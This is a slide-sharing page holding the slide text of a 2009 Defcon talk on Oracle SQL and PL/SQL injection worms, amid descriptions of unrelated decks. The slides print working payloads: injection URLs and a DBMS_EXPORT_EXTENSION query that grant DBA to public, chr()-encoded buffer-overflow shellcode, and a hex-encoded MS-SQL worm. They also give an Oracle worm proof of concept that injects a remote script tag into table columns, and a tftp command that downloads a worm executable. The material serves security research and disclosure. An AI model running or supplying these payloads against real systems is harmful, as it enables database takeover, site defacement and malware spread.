This document discusses various ways to invoke PowerShell from SQL Server and the SQL command line to perform administrative tasks. It provides examples of loading the SQL Server and SQL Analysis Services management objects assemblies to allow administration of SQL Server instances from PowerShell. The document also covers considerations for using SQL authentication in PowerShell and provides some example PowerShell commands for querying SQL Server processes and customizing the output.
07 Using Oracle-Supported Package in Application Developmentrehaniltifat
This document discusses using Oracle-supplied packages for application development. It describes the UTL_MAIL package for managing email, including procedures for sending messages with and without attachments. It also covers the DBMS_SCHEDULER package for automating jobs, including how to create, run, stop, and drop jobs. Finally, it discusses dynamic SQL and executing SQL statements programmatically using native dynamic SQL statements or the DBMS_SQL package.
This document discusses dynamic SQL and metadata in Oracle. It describes how to build and execute SQL statements dynamically using native dynamic SQL with EXECUTE IMMEDIATE statements or the DBMS_SQL package. It also explains how to use the DBMS_METADATA package to obtain metadata from the data dictionary as XML or DDL that can be used to re-create database objects. Examples are provided for dynamic SQL DDL, DML, queries and PL/SQL blocks.
The document discusses various PHP security vulnerabilities like code injection, SQL injection, cross-site scripting (XSS), session hijacking, and remote code execution. It provides examples of each vulnerability and methods to prevent them, such as input validation, output encoding, secure session management, and restricting shell commands. The goal is to teach secure PHP programming practices to avoid security issues and defend against common attacks.
This is one of the 15 minute "TED" style talk presented as part of the Database Symposium at the ODTUG Kscope18 conference. In this presentation @SQLMaria shares details on 4 useful supplied PL/SQL package with the Oracle Database
Similar to Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm (20)
This talk will cover ScyllaDB Architecture from the cluster-level view and zoom in on data distribution and internal node architecture. In the process, we will learn the secret sauce used to get ScyllaDB's high availability and superior performance. We will also touch on the upcoming changes to ScyllaDB architecture, moving to strongly consistent metadata and tablets.
ScyllaDB is making a major architecture shift. We’re moving from vNode replication to tablets – fragments of tables that are distributed independently, enabling dynamic data distribution and extreme elasticity. In this keynote, ScyllaDB co-founder and CTO Avi Kivity explains the reason for this shift, provides a look at the implementation and roadmap, and shares how this shift benefits ScyllaDB users.
Dandelion Hashtable: beyond billion requests per second on a commodity serverAntonios Katsarakis
This slide deck presents DLHT, a concurrent in-memory hashtable. Despite efforts to optimize hashtables, that go as far as sacrificing core functionality, state-of-the-art designs still incur multiple memory accesses per request and block request processing in three cases. First, most hashtables block while waiting for data to be retrieved from memory. Second, open-addressing designs, which represent the current state-of-the-art, either cannot free index slots on deletes or must block all requests to do so. Third, index resizes block every request until all objects are copied to the new index. Defying folklore wisdom, DLHT forgoes open-addressing and adopts a fully-featured and memory-aware closed-addressing design based on bounded cache-line-chaining. This design offers lock-free index operations and deletes that free slots instantly, (2) completes most requests with a single memory access, (3) utilizes software prefetching to hide memory latencies, and (4) employs a novel non-blocking and parallel resizing. In a commodity server and a memory-resident workload, DLHT surpasses 1.6B requests per second and provides 3.5x (12x) the throughput of the state-of-the-art closed-addressing (open-addressing) resizable hashtable on Gets (Deletes).
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation F...AlexanderRichford
QR Secure: A Hybrid Approach Using Machine Learning and Security Validation Functions to Prevent Interaction with Malicious QR Codes.
Aim of the Study: The goal of this research was to develop a robust hybrid approach for identifying malicious and insecure URLs derived from QR codes, ensuring safe interactions.
This is achieved through:
Machine Learning Model: Predicts the likelihood of a URL being malicious.
Security Validation Functions: Ensures the derived URL has a valid certificate and proper URL format.
This innovative blend of technology aims to enhance cybersecurity measures and protect users from potential threats hidden within QR codes 🖥 🔒
This study was my first introduction to using ML which has shown me the immense potential of ML in creating more secure digital environments!
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsDianaGray10
Join us to learn how UiPath Apps can directly and easily interact with prebuilt connectors via Integration Service--including Salesforce, ServiceNow, Open GenAI, and more.
The best part is you can achieve this without building a custom workflow! Say goodbye to the hassle of using separate automations to call APIs. By seamlessly integrating within App Studio, you can now easily streamline your workflow, while gaining direct access to our Connector Catalog of popular applications.
We’ll discuss and demo the benefits of UiPath Apps and connectors including:
Creating a compelling user experience for any software, without the limitations of APIs.
Accelerating the app creation process, saving time and effort
Enjoying high-performance CRUD (create, read, update, delete) operations, for
seamless data management.
Speakers:
Russell Alfeche, Technology Leader, RPA at qBotic and UiPath MVP
Charlie Greenberg, host
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...DanBrown980551
This LF Energy webinar took place June 20, 2024. It featured:
-Alex Thornton, LF Energy
-Hallie Cramer, Google
-Daniel Roesler, UtilityAPI
-Henry Richardson, WattTime
In response to the urgency and scale required to effectively address climate change, open source solutions offer significant potential for driving innovation and progress. Currently, there is a growing demand for standardization and interoperability in energy data and modeling. Open source standards and specifications within the energy sector can also alleviate challenges associated with data fragmentation, transparency, and accessibility. At the same time, it is crucial to consider privacy and security concerns throughout the development of open source platforms.
This webinar will delve into the motivations behind establishing LF Energy’s Carbon Data Specification Consortium. It will provide an overview of the draft specifications and the ongoing progress made by the respective working groups.
Three primary specifications will be discussed:
-Discovery and client registration, emphasizing transparent processes and secure and private access
-Customer data, centering around customer tariffs, bills, energy usage, and full consumption disclosure
-Power systems data, focusing on grid data, inclusive of transmission and distribution networks, generation, intergrid power flows, and market settlement data
QA or the Highway - Component Testing: Bridging the gap between frontend appl...zjhamm304
These are the slides for the presentation, "Component Testing: Bridging the gap between frontend applications" that was presented at QA or the Highway 2024 in Columbus, OH by Zachary Hamm.
In the realm of cybersecurity, offensive security practices act as a critical shield. By simulating real-world attacks in a controlled environment, these techniques expose vulnerabilities before malicious actors can exploit them. This proactive approach allows manufacturers to identify and fix weaknesses, significantly enhancing system security.
This presentation delves into the development of a system designed to mimic Galileo's Open Service signal using software-defined radio (SDR) technology. We'll begin with a foundational overview of both Global Navigation Satellite Systems (GNSS) and the intricacies of digital signal processing.
The presentation culminates in a live demonstration. We'll showcase the manipulation of Galileo's Open Service pilot signal, simulating an attack on various software and hardware systems. This practical demonstration serves to highlight the potential consequences of unaddressed vulnerabilities, emphasizing the importance of offensive security practices in safeguarding critical infrastructure.
Lee Barnes - Path to Becoming an Effective Test Automation Engineer.pdfleebarnesutopia
So… you want to become a Test Automation Engineer (or hire and develop one)? While there’s quite a bit of information available about important technical and tool skills to master, there’s not enough discussion around the path to becoming an effective Test Automation Engineer that knows how to add VALUE. In my experience this had led to a proliferation of engineers who are proficient with tools and building frameworks but have skill and knowledge gaps, especially in software testing, that reduce the value they deliver with test automation.
In this talk, Lee will share his lessons learned from over 30 years of working with, and mentoring, hundreds of Test Automation Engineers. Whether you’re looking to get started in test automation or just want to improve your trade, this talk will give you a solid foundation and roadmap for ensuring your test automation efforts continuously add value. This talk is equally valuable for both aspiring Test Automation Engineers and those managing them! All attendees will take away a set of key foundational knowledge and a high-level learning path for leveling up test automation skills and ensuring they add value to their organizations.
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor IvaniukFwdays
At this talk we will discuss DDoS protection tools and best practices, discuss network architectures and what AWS has to offer. Also, we will look into one of the largest DDoS attacks on Ukrainian infrastructure that happened in February 2022. We'll see, what techniques helped to keep the web resources available for Ukrainians and how AWS improved DDoS protection for all customers based on Ukraine experience
Northern Engraving | Nameplate Manufacturing Process - 2024Northern Engraving
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...Jason Yip
The typical problem in product engineering is not bad strategy, so much as “no strategy”. This leads to confusion, lack of motivation, and incoherent action. The next time you look for a strategy and find an empty space, instead of waiting for it to be filled, I will show you how to fill it in yourself. If you’re wrong, it forces a correction. If you’re right, it helps create focus. I’ll share how I’ve approached this in the past, both what works and lessons for what didn’t work so well.
Must Know Postgres Extension for DBA and Developer during MigrationMydbops
Mydbops Opensource Database Meetup 16
Topic: Must-Know PostgreSQL Extensions for Developers and DBAs During Migration
Speaker: Deepak Mahto, Founder of DataCloudGaze Consulting
Date & Time: 8th June | 10 AM - 1 PM IST
Venue: Bangalore International Centre, Bangalore
Abstract: Discover how PostgreSQL extensions can be your secret weapon! This talk explores how key extensions enhance database capabilities and streamline the migration process for users moving from other relational databases like Oracle.
Key Takeaways:
* Learn about crucial extensions like oracle_fdw, pgtt, and pg_audit that ease migration complexities.
* Gain valuable strategies for implementing these extensions in PostgreSQL to achieve license freedom.
* Discover how these key extensions can empower both developers and DBAs during the migration process.
* Don't miss this chance to gain practical knowledge from an industry expert and stay updated on the latest open-source database trends.
Mydbops Managed Services specializes in taking the pain out of database management while optimizing performance. Since 2015, we have been providing top-notch support and assistance for the top three open-source databases: MySQL, MongoDB, and PostgreSQL.
Our team offers a wide range of services, including assistance, support, consulting, 24/7 operations, and expertise in all relevant technologies. We help organizations improve their database's performance, scalability, efficiency, and availability.
Contact us: info@mydbops.com
Visit: https://www.mydbops.com/
Follow us on LinkedIn: https://in.linkedin.com/company/mydbops
For more details and updates, please follow up the below links.
Meetup Page : https://www.meetup.com/mydbops-databa...
Twitter: https://twitter.com/mydbopsofficial
Blogs: https://www.mydbops.com/blog/
Facebook(Meta): https://www.facebook.com/mydbops/
GlobalLogic Java Community Webinar #18 “How to Improve Web Application Perfor...GlobalLogic Ukraine
Під час доповіді відповімо на питання, навіщо потрібно підвищувати продуктивність аплікації і які є найефективніші способи для цього. А також поговоримо про те, що таке кеш, які його види бувають та, основне — як знайти performance bottleneck?
Відео та деталі заходу: https://bit.ly/45tILxj
"Choosing proper type of scaling", Olena SyrotaFwdays
Imagine an IoT processing system that is already quite mature and production-ready and for which client coverage is growing and scaling and performance aspects are life and death questions. The system has Redis, MongoDB, and stream processing based on ksqldb. In this talk, firstly, we will analyze scaling approaches and then select the proper ones for our system.
1. The Making Of Second SQL
Injection Worm (Oracle
Edition)
Sumit Siddharth
SID@notsosecure.com
www.notsosecure.com
Defcon 17
Las Vegas –2009
2. About Me:
Senior IT Security Consultant
More than 4 years of Penetration Testing
Not an Oracle Geek :(
My Blog: www.notsosecure.com
10 slides + 2 Demos= 20 Mins !!
Defcon 17, Las Vegas, July 2009 2
3. Agenda
How to exploit SQL Injections in web
applications with oracle back-end to achieve
the following:
Escalate privileges from the session user to that
of SYS (Similar to openrowset hacks in MS SQL)
Execute OS Commands and achieve file system
read/write access (Like xp_cmdshell in MS SQL)
Can worms target Oracle web apps? (Just as
they did against MS SQL)
Defcon 17, Las Vegas, July 2009 3
4. Oracle: How Things Work
By default Oracle comes with a lot of stored
procedures and functions.
Mostly these functions and stored procedures
run with definer privileges (default).
In order to make the function execute with the
privileges of the user executing it, the function
must have 'authid current_user' keyword.
If you find a SQL (PL/SQL) injection in a
function owned by SYS and with 'authid definer',
you can run SQL (PL/SQL) as SYS.
Defcon 17, Las Vegas, July 2009 4
5. SQL Injection in Oracle:
• PL/SQL Injection • SQL Injection
• Injection in • Injection in Single SQL
Anonymous Statement
PL/SQL block • Restrictions
• No ';' allowed
• No Restriction
• Need more vulnerabilities
• Execute DDL, DML
• Difficult
• Easy
Defcon 17, Las Vegas, July 2009 5
6. PL/SQL Injection
Injection in Anonymous PL/SQL block
create or replace procedure orasso.test (q IN varchar2) AS
BEGIN
execute immediate ('begin '||q||'; end;');
END;
* Attack has no limitation
* Can Execute DML and DDL statements
* Easy to exploit
* Can Execute Multiple statements:
* q=>null;execute immediate 'grant dba to public';end'--
Defcon 17, Las Vegas, July 2009 6
7. PL/SQL Injection from Web Apps
Vulnerable Oracle Application server allows PL/SQL injection
Bypass the PL/SQL exclusion list:
http://host:7777/pls/orasso/orasso.home?);execute+immediate+:1;
--={PL/SQL}
Execute PL/SQL with permissions of user described in 'DAD'
(orasso_public)
Exploit vulnerable procedures and become DBA
Don't rely on 'create function' privileges
LT.COMPRESSWORKSPACETREE (CPU Oct 2008; milw0rm:7677)
LT.FINDRICSET (CPU October 2007; milw0rm:4572)
.....100 more of these.....
Execute OS code (I Prefer Java)
Defcon 17, Las Vegas, July 2009 7
8. Hacking OAS with OAP_Hacker.pl
OAP_hacker.pl
Supports O.A.S <=10.1.2.2
Relies on PL/SQL injection vulnerability
Exploits vulnerable packages and grants DBA to 'public'
Generally orasso_public do not have create function
privilege
Exploit based on Cursor Injection; Don't need create
function
OS code execution based on Java
Demo
Defcon 17, Las Vegas, July 2009 8
9. PL/SQL Injection
Custom written Packages deployed on OAS may have PL/SQL Injection
Example:
create or replace procedure orasso.test(q IN varchar2) AS
BEGIN
....
execute immediate ('begin '||q||'; end;');
.....
end;
http://host/pls/orasso/orasso.test?q=orasso.home
http://host/pls/orasso/orasso.test?q=execute Immediate 'grant dba to
public'
Defcon 17, Las Vegas, July 2009 9
10. SQL Injection In Web Apps.
Injection in Single SQL statement:
e.g. “Select a from b where c=”.'$input'
Oracle does not support nested query in SQL
To execute multiple query we need to find a PL/SQL
Injection.
How can we inject PL/SQL when the web application's
SQL Injection allows only SQL?
If there is a PL/SQL injection vulnerability in a
function, then we can use web's SQL Injection to call
this function, thereby executing PL/SQL via SQL
Injection.
Defcon 17, Las Vegas, July 2009 10
11. SQL Injection and Vulnerable
Functions
We can call functions in SQL but not procedures
Exploit Functions vulnerable to Buffer overflow and other issues
MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDD
DDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGG
GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHH
HHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR (227)||CHR(251)||CHR(90)||
CHR(19)||CHR(124)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)||
chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)||
chr(255)||chr(208)||'dir >c:dir.txt')--
Exploit Functions vulnerable to PL/SQL Injection
➔If Authid=definer; execute PL/SQL with definer privileges
➔If Authid=current_user; execute PL/SQL; exploit vulnerable packages
➔Privilege escalation; become DBA
➔Execute OS Code
Defcon 17, Las Vegas, July 2009 11
12. Introducing
Dbms_Export_Extension
Its an Oracle package which has had a number
of functions and procedures vulnerable to
PL/SQL injections, allowing privilege escalation.
GET_DOMAIN_INDEX_TABLES(); function
vulnerable to PL/SQL Injection; owned by sys;
runs as sys
We can inject PL/SQL within this function and
the PL/SQL will get executed as SYS.
The Function can be called from SQL queries
such as SELECT, INSERT, UPDATE etc.
Defcon 17, Las Vegas, July 2009 12
13. PL/SQL Injection in
dbms_export_extension
FUNCTION GET_DOMAIN_INDEX_TABLES ( INDEX_NAME IN VARCHAR2, INDEX_SCHEMA IN
VARCHAR2, TYPE_NAME IN VARCHAR2, TYPE_SCHEMA IN VARCHAR2, READ_ONLY IN
PLS_INTEGER, VERSION IN VARCHAR2, GET_TABLES IN PLS_INTEGER)
RETURN VARCHAR2 IS
BEGIN
[...]
STMTSTRING := 'BEGIN ' || '"' || TYPE_SCHEMA || '"."' || TYPE_NAME ||
'".ODCIIndexUtilCleanup(:p1); ' || 'END;';
DBMS_SQL.PARSE(CRS, STMTSTRING, DBMS_SYS_SQL.V7);
DBMS_SQL.BIND_VARIABLE(CRS,':p1',GETTABLENAMES_CONTEXT);
[...]
END GET_DOMAIN_INDEX_TABLES;
Defcon 17, Las Vegas, July 2009 13
14. Example
select
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_
INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PU
T(:P1);EXECUTE IMMEDIATE ''DECLARE
PRAGMA AUTONOMOUS_TRANSACTION;BEGIN
EXECUTE IMMEDIATE '''' grant dba to
public'''';END;'';END;-- ','SYS',0,'1',0) from dual
Fixed in CPU April 2006.
Vulnerable versions: Oracle 8.1.7.4, 9.2.0.1 -
9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2,
XE Defcon 17, Las Vegas, July 2009 14
15. Bsqlbf v2.3
Uses this Oracle exploit to achieve the
following:
Privilege escalation (Type 3)
OS code execution (Type 4)
with Java (default; stype 0)
with plsql_native_make_utility (Oracle 9; stype 1)
with dbms_scheduler (oracle 10; stype 2)
File system read/write access (Type 5;Java only)
Demo available at www.notsosecure.com
Defcon 17, Las Vegas, July 2009 15
16. SQL Injection w0rms
MS-SQL:
s=290';DECLARE%20@S
%20NVARCHAR(4000);=CAST(0x6400650063006C00610072006500200040006D0020007600610072006300680061007200280038003000300030002900
3B00730065007400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D002B0027007500700064006100740065
005B0027002B0061002E006E0061006D0065002B0027005D007300650074005B0027002B0062002E006E0061006D0065002B0027005D003D0072007400
720069006D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0062002E006E0061006D0065002B002700290
029002B00270027003C0073006300720069007000740020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E0065
0074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0027002000660072006F006D002000640062006F002
E007300790073006F0062006A006500630074007300200061002C00640062006F002E0073007900730063006F006C0075006D006E007300200062002C00
640062006F002E007300790073007400790070006500730020006300200077006800650072006500200061002E00690064003D0062002E0069006400200
061006E006400200061002E00780074007900700065003D0027005500270061006E006400200062002E00780074007900700065003D0063002E00780074
00790070006500200061006E006400200063002E006E0061006D0065003D002700760061007200630068006100720027003B00730065007400200040006
D003D005200450056004500520053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720069006E006700280
040006D002C0050004100540049004E004400450058002800270025003B00250027002C0040006D0029002C00380030003000300029003B00730065007
400200040006D003D005200450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B00%20AS
%20NVARCHAR(4000));EXEC(@S);--
Oracle:
http://127.0.0.1:81/ora4.php?name=1 and 1=(select
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE
PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set
current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||chr(97)||chr(116)||
chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||chr(116)||chr(32)||C.column_name||chr(61)||C.column_name||
chr(124)||chr(124)||chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||chr(115)||chr(114)||chr(99)||
chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)||
chr(111)||chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr(101)||chr(46)||chr(99)||chr(111)||
chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)||
chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE
T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr(82)||chr(83) and C.data_type like
chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE
rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
Defcon 17, Las Vegas, July 2009 16
17. What 'could' the worm do
Update certain database tables
The website not starts to distribute malware
Pwn legitimate users of the site with browser exploits
There are enough 'ie' 0 days out there.
OS code execution allows distribution of other worms such as Conflicker!
select LinxRunCmd('tftp -i x.x.x.x GET conflicker.exe') from dual
Exploit other Oracle components on internal network
Oracle Secure back-up; Remote Command Injection (CPU 2009)
SQL Injection in Oracle Enterprise Manager (CPU 2009)
TNS Listener exploits (milw0rm: 8507)
....100 other things to do....
Defcon 17, Las Vegas, July 2009 17
18. Demos
Demo 1: Hacking OAS with OAS_hacker.pl
Demo 2: Privilege escalation; Extracting data with SYS
privileges (visit www.notsosecure.com)
Demo 3: O.S code execution; With Java (@ notsosecure)
Demo 4: P.O.C for a potential Oracle SQL Injection worm
Defcon 17, Las Vegas, July 2009 18
19. Thank You
References:
http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_kupw$worker2.html
http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_lt_findricset.html
http://www.breach.com/resources/breach-security-labs/alerts/breach-security-labs-releases-alert-on-oracle-application-ser
http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.html
http://sec.hebei.com.cn/bbs_topic.do?forumID=18&postID=4275&replyID=0&skin=1&saveSkin=true&pages=0&replyNum
http://milw0rm.com/exploits/3269
http://www.securityfocus.com/bid/17699
http://www.orafaq.com/wiki/PL/SQL_FAQ#What_is_the_difference_between_SQL_and_PL.2FSQL.3F
http://www.red-database-security.com/wp/confidence2009.pdf
http://alloracletech.blogspot.com/2008/07/authid-definer-vs-authid-currentuser.html
http://www.owasp.org/index.php/Testing_for_Oracle
http://www.red-database-security.com/wp/google_oracle_hacking_us.pdf
http://lab.mediaservice.net/notes_more.php?id=Oracle_Portal_for_Friends
http://www.red-database-security.com/exploits/oracle_sql_injection_oracle_kupw$worker2.html
http://www.blackhat.com/presentations/bh-usa-05/bh-us-05-fayo.pdf
And Lots more; can't fit in the space here....
Defcon 17, Las Vegas, July 2009 19